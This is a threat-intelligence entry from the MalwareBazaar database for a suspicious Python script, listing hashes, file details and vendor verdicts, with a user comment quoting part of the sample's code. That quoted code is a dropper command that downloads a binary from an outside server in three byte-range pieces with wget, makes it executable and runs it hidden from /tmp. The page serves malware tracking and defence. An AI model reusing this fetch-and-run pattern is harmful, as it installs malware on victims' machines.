MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 f8d7812cd71ee6db6ccd5e0890107b0f35557cbe176dc3cf7ac3ec1a6f5ed81b. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 4


Intelligence 4 IOCs YARA File information Comments 1

SHA256 hash: f8d7812cd71ee6db6ccd5e0890107b0f35557cbe176dc3cf7ac3ec1a6f5ed81b
SHA3-384 hash: c984c511c705c262a4d7364673236fa02acff299df386140e93a60d9bb11e20db8c67797c5741e8099617f5e826cb1a0
SHA1 hash: 0c9ea88cddad80564f235179f3efb0ffed6338cc
MD5 hash: 9cb6886001913061e05ddeadc4fd4250
humanhash: lamp-alaska-steak-rugby
File name:1.py
Download: download sample
File size:9'646 bytes
First seen:2026-08-06 17:49:40 UTC
Last seen:Never
File type:
MIME type:text/x-script.python
ssdeep 192:hyo6LkVD54ix/o8HGJRVxM96UNXRWW0QM9W4CsId0:hyo6LEis/rHI864099a0
TLSH T1A712A5494C82A56283B289ADDE26D869F316370767262012FDACC6535F78726C3789BC
TrID 70.0% (.) Unix-like shebang (var.1) (gen) (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika python
Reporter BlinkzSec
Tags:py

Intelligence


File Origin
# of uploads :
1
# of downloads :
48
Origin country :
CH CH
Vendor Threat Intelligence
No detections
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
anti-vm base64 expand lolbin
Verdict:
Clean
File Type:
unix shell
First seen:
2026-08-06T15:25:00Z UTC
Last seen:
2026-08-06T16:10:00Z UTC
Hits:
~10
Threat name:
Text.Trojan.Generic
Status:
Suspicious
First seen:
2026-08-06 17:49:25 UTC
File Type:
Text (Python)
AV detection:
4 of 24 (16.67%)
Threat level:
  5/5
Result
Malware family:
n/a
Score:
  1/10
Tags:
linux
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments



Avatar
commented on 2026-08-06 18:16:18 UTC

downloads this: https://www.virustotal.com/gui/file/edb656c5f2db96b7ed833883de062ba2580c45bc37ad048f6a1e14c11ea60a53

# ============================================================
# 三段式 Range 分段下载配置:
# 针对 ~6.1MB 的 agent.bin,切成 3 段分别用 curl 下载并追加组合
# ============================================================
SERVER_URL = "hxxp://193.26.115/.231:8001/agent.bin"

COMMAND = (
f"rm -f /tmp/agent.bin && "
f"wget --header='Range: bytes=0-2000000' -qO /tmp/agent.bin {SERVER_URL} && "
f"wget --header='Range: bytes=2000001-4500000' -qO - {SERVER_URL} >> /tmp/agent.bin && "
f"wget --header='Range: bytes=4500001-' -qO - {SERVER_URL} >> /tmp/agent.bin && "
f"chmod +x /tmp/agent.bin && /tmp/agent.bin >/dev/null 2>&1 &; "
f"echo {MARKER};"
)